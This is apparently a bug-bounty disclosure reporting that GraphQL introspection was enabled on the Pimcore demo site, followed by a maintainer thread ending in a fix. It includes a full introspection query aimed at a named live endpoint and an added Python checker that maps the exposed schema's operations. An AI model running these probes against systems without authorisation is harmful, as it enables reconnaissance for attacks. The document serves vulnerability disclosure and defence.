Introspection query is enabled on demo.pimcore.fun in pimcore/demo

Valid

Reported on

Mar 11th 2023


Description

Introspection is enabled on demo.pimcore.fun. The demo site offers a GraphQL feature for users, but via that GraphQL endpoint an attacker can run introspection queries, which makes the site vulnerable.

Proof of Concept

Just visit https://demo.pimcore.fun/pimcore-datahub-webservices/explorer/assets and run the following query:
```graphql
{
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    subscriptionType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}
```

# Reference
https://www.apollographql.com/blog/graphql/security/why-you-should-disable-graphql-introspection-in-production/

# Impact

An attacker can obtain the full GraphQL schema and thereby map the entire attack surface of the API: every query, mutation, type and argument it exposes.
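The following Python script is an added example, not part of the original report and not Pimcore's own code. It sends the same kind of introspection request the PoC uses, classifies the reply as introspection enabled or disabled, and turns an enabled reply into a summary of the exposed attack surface (root query, mutation and subscription fields with their argument and return types), which is the point made under Impact. The ENDPOINT URL, the two sample replies and the field names in them are constructed for illustration, not captured from demo.pimcore.fun.

```python
"""Added example, not code from the original report or from Pimcore: an
offline-testable GraphQL introspection checker. It builds the POST an
explorer sends, tells whether the reply contains __schema data, and maps
the exposed root operation fields. ENDPOINT and the sample replies are
constructed; the field names do not claim to match any real schema."""
import json
import sys
import urllib.request

# Reduced form of the PoC query: enough to see whether __schema is served
# and to list the root operation fields with their argument/return types.
INTROSPECTION_QUERY = """
{
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      kind
      name
      fields(includeDeprecated: true) {
        name
        args { name type { kind name ofType { kind name } } }
        type { kind name ofType { kind name } }
      }
    }
  }
}
"""

ENDPOINT = "https://graphql.example.invalid/graphql"  # hypothetical, never contacted below


def build_request(url, query=INTROSPECTION_QUERY):
    """POST {"query": ...} as JSON, the way GraphQL explorers submit queries."""
    body = json.dumps({"query": query}).encode()
    return urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}, method="POST"
    )


def introspection_enabled(reply):
    """True when the server answered the __schema selection with data.

    A server with introspection disabled returns no __schema data and an
    "errors" entry instead (the exact message wording is server-specific).
    """
    data = reply.get("data") or {}
    return bool(data.get("__schema"))


def type_signature(t):
    """Render a __Type reference in GraphQL syntax, e.g. Int!, [Asset]."""
    if not t:
        return "?"  # wrapper nested deeper than the query asked for
    if t.get("kind") == "NON_NULL":
        return type_signature(t.get("ofType")) + "!"
    if t.get("kind") == "LIST":
        return "[" + type_signature(t.get("ofType")) + "]"
    return t.get("name") or "?"


def attack_surface(reply):
    """Map each root operation type to {field: {"args": {...}, "returns": ...}}."""
    schema = reply["data"]["__schema"]
    types_by_name = {t["name"]: t for t in schema["types"]}
    surface = {}
    for op in ("queryType", "mutationType", "subscriptionType"):
        root = schema.get(op)
        if not root:
            continue  # this operation type is not defined by the schema
        fields = types_by_name.get(root["name"], {}).get("fields") or []
        surface[op] = {
            f["name"]: {
                "args": {a["name"]: type_signature(a["type"]) for a in f.get("args") or []},
                "returns": type_signature(f["type"]),
            }
            for f in fields
        }
    return surface


def check(url):
    """Live check against a real endpoint (needs network access)."""
    with urllib.request.urlopen(build_request(url), timeout=15) as resp:
        reply = json.load(resp)
    enabled = introspection_enabled(reply)
    return {"enabled": enabled, "surface": attack_surface(reply) if enabled else {}}


def _ref(kind, name, of=None):  # compact __Type reference for the constructed sample
    return {"kind": kind, "name": name, "ofType": of}


# Constructed sample replies (not captured from demo.pimcore.fun).
ENABLED_REPLY = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"}, "subscriptionType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "asset", "args": [{"name": "id", "type": _ref("NON_NULL", None, _ref("SCALAR", "Int"))}],
             "type": _ref("OBJECT", "Asset")},
            {"name": "assetListing", "args": [{"name": "filter", "type": _ref("SCALAR", "String")}],
             "type": _ref("LIST", None, _ref("OBJECT", "Asset"))}]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "updateAsset", "args": [{"name": "id", "type": _ref("NON_NULL", None, _ref("SCALAR", "Int"))}],
             "type": _ref("SCALAR", "Boolean")}]},
        {"kind": "OBJECT", "name": "Asset", "fields": []},
        {"kind": "SCALAR", "name": "Int", "fields": None}]}}}
DISABLED_REPLY = {"data": None, "errors": [{"message": "GraphQL introspection is not allowed"}]}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python check_introspection.py https://host/graphql
        print(json.dumps(check(sys.argv[1]), indent=2))
    else:
        print("enabled sample:", introspection_enabled(ENABLED_REPLY))
        print(json.dumps(attack_surface(ENABLED_REPLY), indent=2))
        print("disabled sample:", introspection_enabled(DISABLED_REPLY))
```

Run it with an endpoint URL as the first argument to check a live host; with no argument it runs against the constructed samples. The distinction it relies on is the one that matters for this report: an endpoint with introspection disabled answers with no `data.__schema` and an `errors` entry, whereas an enabled one hands back the schema from which the root fields, argument names and types are read off, exactly the information the PoC query above pulls down in full.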
We are processing your report and will contact the pimcore/demo team within 24 hours. a year ago
We have contacted a member of the pimcore/demo team and are waiting to hear back a year ago
rutvikhajare
a year ago

Researcher


Hey there, any updates on this?

pimcore/demo maintainer has acknowledged this report 10 months ago
rutvikhajare
10 months ago

Researcher


Hey there, any updates on this?

rutvikhajare
9 months ago

Researcher


Hey there, any updates on this?

rutvikhajare
9 months ago

Researcher


Hey there, can you please provide an update on this? It's been so many days and even months.

rutvikhajare
7 months ago

Researcher


Hey, are you going to reply to this or not?

Divesh Pahuja modified the Severity from Critical (9.8) to Medium (6.1) 6 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Divesh Pahuja validated this vulnerability 6 months ago
rutvikhajare has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Divesh Pahuja
6 months ago

Maintainer


Hi @rutvikhajare, sorry for the late response. Please update the affected version to 10.2.6, as the issue was fixed in version 10.3.0 of pimcore/demo.

rutvikhajare
6 months ago

Researcher


Can we have a CVE for this?

Divesh Pahuja
5 months ago

Maintainer


Hi @rutvikhajare, yes, after we mark it as fixed. We are just waiting for the affected version to be corrected in this report, as the fix was done in 10.3.0.

@admin could you please help in correcting the affected version to 10.2.6 here? Thanks!

Divesh Pahuja
5 months ago

Maintainer


@admin friendly reminder

Ben Harvie
5 months ago

Admin


Hey Divesh, the affected version has now been updated as requested :)

rutvikhajare
5 months ago

Researcher


Hey Divesh, as the affected version has been updated, can you please go ahead with the further process?

Divesh Pahuja
5 months ago

Maintainer


thank you guys!

Divesh Pahuja marked this as fixed in 10.3.0 with commit a2a7ff 5 months ago
The fix bounty has been dropped
This vulnerability has now been published 5 months ago